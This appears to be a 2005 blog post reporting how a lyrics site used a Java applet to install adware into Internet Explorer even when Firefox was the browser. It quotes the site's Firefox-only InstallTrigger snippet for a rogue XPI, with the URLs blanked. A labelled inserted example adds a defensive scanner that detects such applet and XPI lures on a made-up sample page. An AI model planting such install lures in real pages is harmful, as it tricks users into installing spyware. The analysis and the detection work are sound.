Firefox Spyware infects IE?
What if there was an infection out there that could bypass Firefox and still get its grubby little paws on IE, and from there, the heart of your OS? What if that same infection could get past not only FF, but a whole raft of other (supposedly more secure) browsers too?
What if, of all people, Neil Diamond was indirectly involved in this craziness?
Unfortunately, this has now become a reality and woe betide anyone looking for lyrics from Neil's latest hit. You're more likely to end up with a nasty case of browseritis. After hearing rumours of a "Firefox Adware bundle" from this thread, I thought I'd go check it out. The results were, as they say, a right kick in the pants.
But how could this happen?
The answer is that some sneaky coding is being used to get around your browser of choice (whatever that may be). Upon visiting the target website, nothing happens. Nothing, that is, unless you have Sun's Java Runtime Environment installed on the host machine. And seeing how everyone is being urged to turn away from Microsoft's Java in favour of Sun's version, this could spell problems for the browsers currently lording it over IE.
Think you're safe because you're not actually using IE? Think you're safe because you have IE locked down tight with a HOSTS file, SpywareBlaster and the built-in security settings cranked up to the max? Wrong. This is a shot of IE with the infection domain already added to the "Restricted Sites" zone in Internet Options. Note the "ironic" affiliate banner for Firefox.
So far, so good. Using IE, nothing is getting through. And using Firefox (or some other "secure" browser) will keep me totally secure, yes?...
...well, not exactly. Visit the same page in FF and, with the JRE up and running, the below happens (click here for a bigger view of the webpage):
Being a curious soul, I agreed to the install - and quickly wished I hadn't! In a flurry of remote downloads, numerous changes to the registry took place and a sizeable number of IE-specific installs began downloading. Amongst the assortment were DyFuCA, Internet Optimizer, ISTsvc, Kapabout, sais (180 Solutions), SideFind, Avenue Media and something called djtopr1150.exe lurking in the Temp folder.
Imagine my surprise when, unannounced, IE then suddenly opened up without me doing anything and looked like this:
Congratulations! Your PC is boned!
It goes without saying that, apart from Webrebates opening up adverts in the bottom right-hand corner, whole swathes of entries in my favourites advertising "adware removers" that also sell popup blockers (with popups!), Powerscan loading at startup and yelling "DON'T GET CAUGHT WITH PORN ON YOUR PC!", a SideFind bar that doesn't actually do very much and an MTV toolbar to keep the kids quiet, there was my jaw being slowly scraped off the floor as I realised that for all Firefox's bravado, it had been cut down dead in an instant by what would normally be a bunch of rather average adware installs.
The problem is, IE shouldn't have been hit in this way - especially as it was locked down so tightly, and wasn't even being used at the time. Vaguely worried by this, I tried some other browsers...the results aren't exactly fantastic reading for the Mozilla Foundation (or anyone else, for that matter):
Firefox 1.0.1 - The install works.
Mozilla - The install works.
Avant browser 10.0 (build 153) - The install works.
Netscape 7.2 - The damn thing kept crashing, but eventually I was able to discover that the install works.
NetCaptor 7.5.4 - The install is blocked.
Opera 7.5.4 - The install is blocked.
Only two out of six had the good sense to steer clear of even asking the user if they wanted to install the applet. Not exactly a dazzling result.
(And it's since been confirmed by Daniel Veditz, owner of the Security Group over at the Mozilla Foundation, that this will indeed work in Opera with the right permissions enabled - though to date, I still haven't been able to get this to work. More here.)
So how is this happening? The developers of this install are using the Java Runtime Environment: the initial installer takes the form of a Java applet rather than an ActiveX control, which only IE supports. It is the JRE, not the browser, that decides whether to run the applet, so if the browser has a working Java plugin it doesn't seem to matter what browser you're using, or (more worryingly) how tight your IE security is. The only thing standing between you and the install is the JRE's own prompt asking whether to run the applet; click through it (as I did) and the applet runs with your user privileges, outside anything set in Internet Options. And for those of you at the back, here's the .jar file in all its cached glory (you'll have to put up with a clickable link for this one, it wouldn't fit on the page!). I should also point out that deleting the .jar file from the cache using the Java console will not remove the numerous IE spyware and system infections now loaded onto your PC. This will only remove the initial installer.
Does this mean the Emperor's new clothes syndrome has hit Firefox? Possibly not, though it doesn't take a genius to work out that if "The Browser you Can Trust" now has to keep one eye on its older, slightly clumsier brother as well as watch its own back then there's a very good chance its tail could be getting ready for the mother of all burnings.
Update - 24/03/2005
I always maintained that the original Lyricspy website did not try to load up any Firefox-specific spyware, as a direct response to the Tom Coyote "Theory" thread (note I was the first on there to point out Java was to blame). I did stand by my stance that this was a "browser issue", and still do, as the Opera developers have now said they are going to change the way their browser handles Java too. Expect more to follow suit.
However - it turns out that Firefox specific spyware was involved in the Lyricspy page - and who pointed this out to me?
Someone from a Firefox forum!
In my original tests, I found that disabling software installs in Firefox would send the page into a tailspin, and I couldn't figure out why. Someone from a Firefox forum suggested that this behaviour only happens when a Firefox-specific install (in other words, an XPI) is attempted. Check out the below, lifted from the JavaScript installer served from ysbweb.com:
// InstallTrigger is a Firefox/Mozilla-only object; updateEnabled() is true when
// the browser allows websites to install software (XPI packages).
if (InstallTrigger.updateEnabled()) {
    // Prompts the user to install the XPI; the object maps a display name to the package URL.
    InstallTrigger.install({'Content Access Plugin 1.01' : ''});
} else {
    // Not Firefox, or installs disabled: send the visitor elsewhere instead.
    location.replace('');
}
The code above tries to load a rogue Firefox .xpi. This is a rather crude .xpi installer that loads the xxx toolbar into IE; it's currently being examined by some of our "file curious" members.
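Both lures described on this page, the Java applet that works in any browser with the JRE (the "So how is this happening?" section) and the Firefox-only InstallTrigger XPI snippet above, leave a recognisable fingerprint in the page source. The scanner below is an added example, not code from the original post, from the lyrics site or from ysbweb.com: it pulls applet loaders (and the .jar they point at) out of the markup and InstallTrigger.install() entries out of inline scripts. The sample page at the bottom is constructed for illustration, and the example.invalid URLs, file names and "Installer.class"/"Loader.class" names are assumptions; the Java Plug-in classid is the well-known one that browsers use for <object> applet loaders.

```javascript
// Added example, not code from the original post or from the sites it describes:
// a small static scanner for the two installer lures discussed above, the Java
// applet (<applet>, Java-plugin <object>, or <embed>) that works in any browser
// with the JRE, and the Firefox-only InstallTrigger.install() XPI call.
// Run with: node scanner.js

// Well-known classid of the Sun Java Plug-in, used by <object> applet loaders.
const JAVA_PLUGIN_CLSID = '8AD9C840-044E-11D1-B3E9-00805F499D93';

// Parse name="value" / name='value' / name=value pairs from a tag's attribute text.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    const value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Find every way a page can hand the JRE an applet, and which .jar it points at.
function findAppletLoaders(html) {
  const found = [];
  let m;

  const appletRe = /<applet\b([^>]*)>/gi;
  while ((m = appletRe.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    found.push({ kind: 'applet', code: a.code || null, archive: a.archive || null });
  }

  // <object classid="clsid:..."> carries its code/archive in <param> children.
  const objectRe = /<object\b([^>]*)>([\s\S]*?)<\/object>/gi;
  while ((m = objectRe.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    const isJava = (a.classid || '').toUpperCase().includes(JAVA_PLUGIN_CLSID) ||
                   (a.type || '').toLowerCase().startsWith('application/x-java');
    if (!isJava) continue;
    const params = {};
    const paramRe = /<param\b([^>]*)>/gi;
    let p;
    while ((p = paramRe.exec(m[2])) !== null) {
      const pa = parseAttrs(p[1]);
      if (pa.name) params[pa.name.toLowerCase()] = pa.value;
    }
    found.push({ kind: 'object', code: params.code || null, archive: params.archive || null });
  }

  const embedRe = /<embed\b([^>]*)>/gi;
  while ((m = embedRe.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    if (!(a.type || '').toLowerCase().startsWith('application/x-java')) continue;
    found.push({ kind: 'embed', code: a.code || null, archive: a.archive || null });
  }
  return found;
}

// Pull the {'display name' : 'xpi url'} pairs out of InstallTrigger.install() calls.
function findXpiInstalls(script) {
  const found = [];
  const callRe = /InstallTrigger\.install\s*\(\s*\{([^}]*)\}/g;
  let m;
  while ((m = callRe.exec(script)) !== null) {
    const pairRe = /(["'])(.*?)\1\s*:\s*(["'])(.*?)\3/g;
    let p;
    while ((p = pairRe.exec(m[1])) !== null) {
      found.push({ name: p[2], url: p[4] });
    }
  }
  return found;
}

// Scan a whole page: applet loaders in the markup, XPI installs in inline scripts.
function scanPage(html) {
  const xpis = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) xpis.push(...findXpiInstalls(m[1]));
  return {
    applets: findAppletLoaders(html),
    xpis,
    usesInstallTrigger: /InstallTrigger\./.test(html),
  };
}

// Constructed sample page (not the real lyrics site): one <applet>, one Java
// <object>, and the ysbweb-style InstallTrigger snippet with a made-up XPI URL.
const SAMPLE_PAGE = `
<html><body>
<h1>Lyrics</h1>
<applet code="Installer.class" archive="loader.jar" width="1" height="1"></applet>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1">
  <param name="code" value="Loader.class">
  <param name="archive" value="http://example.invalid/loader.jar">
</object>
<script>
if (InstallTrigger.updateEnabled()) {
  InstallTrigger.install({'Content Access Plugin 1.01' : 'http://example.invalid/cap.xpi'});
} else { location.replace('http://example.invalid/fallback.html'); }
</script>
</body></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_PAGE), null, 2));
```

The point of treating the two lures together is the one the page makes: a 1x1 applet tag is browser-neutral, so a site that wants everybody gets the JRE to do the work and only falls back to InstallTrigger for Firefox. Run it over a saved copy of a suspect page (or the HTML fragments your proxy logged) and the report tells you which .jar to pull from the Java cache and which XPI name to expect in the Firefox install prompt.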
By chance, I happened to stumble upon a bunch of other sites that (last year) tried similar .xpi installs, which Mozilla put out a fix for rather quickly. Upon revisiting these sites, they now all use the Java applet alongside the .xpi install, and it's possible the .xpi files have been updated, which is why they're currently being looked at (to see how they work alongside the Java).
So after all the chaos and "browser warring" that erupted over this whole thing, it actually turns out there was "Firefox spyware" buried away in the code (or at least, an installer that seems to attempt to change an obscure setting in Firefox regarding certificates, along with serving up the xxx toolbar into IE), and it was brought to light by none other than a Firefox forum member!
So it seems my title was rather more accurate than anyone gave me credit for, myself included...because the answer to my (perfectly reasonable) question, sadly, was yes.
It's just a shame certain individuals felt the need to jump all over me beforehand.

